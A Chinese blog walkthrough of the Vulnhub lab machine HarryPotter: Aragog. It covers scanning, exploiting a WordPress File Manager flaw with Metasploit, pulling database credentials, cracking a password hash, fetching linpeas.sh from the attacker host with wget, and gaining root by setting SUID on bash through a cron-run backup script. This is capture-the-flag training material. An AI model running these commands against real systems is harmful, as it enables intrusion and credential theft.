看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,先来第一个Aragog老样子需要获得root权限找到flag(这里是魂器)即可。

在这里插入图片描述

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述

渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103

在这里插入图片描述
发现开启了2280端口,先访问一下哈利波特(经典再现)🆗还是老样子dirb、dirsearch、whatweb、gobuster、nikto

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里我们扫到了一堆/blog/子目录还有后台一看就是WordPresscms的框架🆗 这里可以使用一个工具 wpscan

②:漏洞发现:

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等,Kali Linux默认自带了WPScan 可以-h 查看具体用法参数

在这里插入图片描述

wpscan --api-token=自己的值 --url=http://192.168.0.103/blog -e vp  #记得自己注册个账号拿api-token的值 不然扫描不会显示漏洞信息的

在这里插入图片描述
其实就有关于file Manager的 我们可以使用MSF去测试一下

③:漏洞利用:
search wordpress file manager #搜索manager相关漏洞信息
use  exploit/multi/http/wp_file_manager_rce #使用模块
show options  #查看需要的设置的参数
set RHOST 192.168.0.103  #设置靶机ip
set LHOST 192.168.0.105   #设置本地ip
set payload  #可以设置 可以不设
set TARGETURI /blog
run  #运行即可

在这里插入图片描述
在这里插入图片描述
🆗这里就渗透进来了,在/home 下面的 hagrid98文件下发现第一个魂器base64解码即可。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

④:数据库语句查询:

🆗这里我们找到了第一个魂器 使用 getuid 发现权限比较低 这里我们的思路就是需要提权操作了!

思路:wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php

在这里插入图片描述
在这里插入图片描述
得到账号和密码:root/mySecr3tPass

python3 -c 'import pty; pty.spawn("bin.bash");'  #开启交互
mysql -u root -p  #登入数据库
show databases;  #列出库
use wordpress;  #使用wordpress库
show tables;  #查询表
select * from wp_users; #查询表内容

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后MD5解码得到密码:password123

MD5在线解密:https://www.somd5.com/

在这里插入图片描述

⑤:SSH登入:

得到了账号密码:hagrid98/password123 尝试登入,登入成功!!!

在这里插入图片描述
在这里插入图片描述

⑥:备份文件提权:

这里需要下载 linpeas.sh 用于辅助提权的开启临时网页:python3 -m http.server 9000 在使用wget下载到靶机

linpeas.sh下载地址:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget http://192.168.0.105:9000/linpeas.sh  #wget 下载到靶机
chmod 777 linpeas.sh # 给个权限
./linpeas.sh #运行 进行扫描

在这里插入图片描述
在这里插入图片描述
扫描发现有backup备份文件,这个脚本的意思就是把上传的文件复制到/tmp 然后过段时间会执行。

在这里插入图片描述
在这里插入图片描述
这里可以继续传pspy64用来看定时任务的(我懒得传了,大晚上肝文章要睡觉着了)直接为可以执行bash就行了

在这里插入图片描述

chmod +s /usr/bin/bash #给个权限
/usr/bin/bash -p  #执行bash
⑦:获取FLAG:

在这里插入图片描述
base64解码即可。

在这里插入图片描述
在这里插入图片描述

剩下得魂器 下次探索吧!已经凌晨 20分钟了 狗命要紧!!

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度高,主要i是最后得提权吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf
2.数据库的基本操作 查询语句 select * from python3开启交互 以及开临时网页(最基本的讲过很多次了)
3.wpscan工具的使用 探测WordPress 框架
4.MSF框架:exploit/multi/http/wp_file_manager_rce的使用
5.linpeas.sh辅助提权的使用,查询定时任务pspy64 备份文件提权

HarryPotter系列第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值